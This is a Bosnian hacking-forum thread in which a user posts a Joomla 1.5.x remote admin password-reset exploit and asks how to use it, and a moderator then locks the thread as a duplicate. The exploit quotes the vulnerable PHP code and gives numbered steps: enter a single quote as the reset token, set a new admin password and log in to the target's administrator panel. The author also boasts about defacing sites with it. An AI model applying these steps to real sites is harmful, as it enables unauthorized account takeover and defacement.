BiH Hack Forum
Pozdrav..
Ukoliko FORUM posjecujes kao GOST imas ogranicene ovlasti!

Loguj se ili Registruj da bi u potpunosti mogao vidjeti FORUM


Home­Portal­Download­REKLAME­Kako koristiti ovaj Forum?­Registracija­Login
BiH Hack Forum :: Arhiva :: ArhivaShare | 
 

 help !

Vidi prethodnu temu Vidi sljedeću temu Go down 
AutorPoruka
Roe
Activ Member
Activ Member


Broj komentara: 50
Poeni: 135
Pristupio forumu: 2010-01-18

KomentarNaslov komentara: help !   Wed Jan 20, 2010 5:55 pm
Izvinite spam
nasao sam exploit nz kako da radim na njega help nekoj pls

###########################################################################
##########
#### Joomla 1.5.x Remote Admin Password Change
####
###########################################################################
##########
#
#
# Author: d3m0n (d3m0n@o2.pl)
#
# Greets: GregStar, gorion, d3d!k
#
#
#
# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice
0-day pff #
#
#
###########################################################################
##########



File : /components/com_user/controller.php

###########################################################################
##########
Line : 379-399

function confirmreset()
{
// Check for request forgeries
JRequest::checkToken() or die( 'Invalid Token' );

// Get the input
$token = JRequest::getVar('token', null, 'post', 'alnum'); <
--- {1}

// Get the model
$model = &$this->getModel('Reset');

// Verify the token
if ($model->confirmReset($token) === false) < --- {2}
{
$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED',
$model->getError());
$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm'
, $message);
return false;
}

$this->setRedirect('index.php?option=com_user&view=reset&layout=complete'
);
}

###########################################################################
##########

File : /components/com_user/models/reset.php

Line: 111-130



function confirmReset($token)
{
global $mainframe;

$db = &JFactory::getDBO();
$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation =
'.$db->Quote($token)); < ---- {3}

// Verify the token
if (!($id = $db->loadResult()))
{
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}

// Push the token and user id into the session
$mainframe->setUserState($this->_namespace.'token', $token);
$mainframe->setUserState($this->_namespace.'id', $id);

return true;
}
###########################################################################
##########



{1} - Replace ' with empty char
{3} - If you enter ' in token field then query will be looks like : "SELECT
id FROM jos_users WHERE block = 0 AND activation = '' "


Example :


1. Go to url :
target.com/index.php?option=com_user&view=reset&layout=confirm

2. Write into field "token" char ' and Click OK.

3. Write new password for admin

4. Go to url : target.com/administrator/

5. Login admin with new password
Na vrh Go down
H4x0Я
Major
Major


Broj komentara: 226
Poeni: 555
Pristupio forumu: 2009-11-08
Godine: 18

KomentarNaslov komentara: Re: help !   Wed Jan 20, 2010 6:29 pm
tema postoji

Spoiler:
 


lock

______________________________


Na vrh Go down
 

help !

Vidi prethodnu temu Vidi sljedeću temu Na vrh 
Stranica 1/1

Permissions of this forum:Ne možete odgovoriti na teme ili komentare u ovom forumu
BiH Hack Forum :: Arhiva :: Arhiva-
 
Powered by forumotion.com
created by Drag0n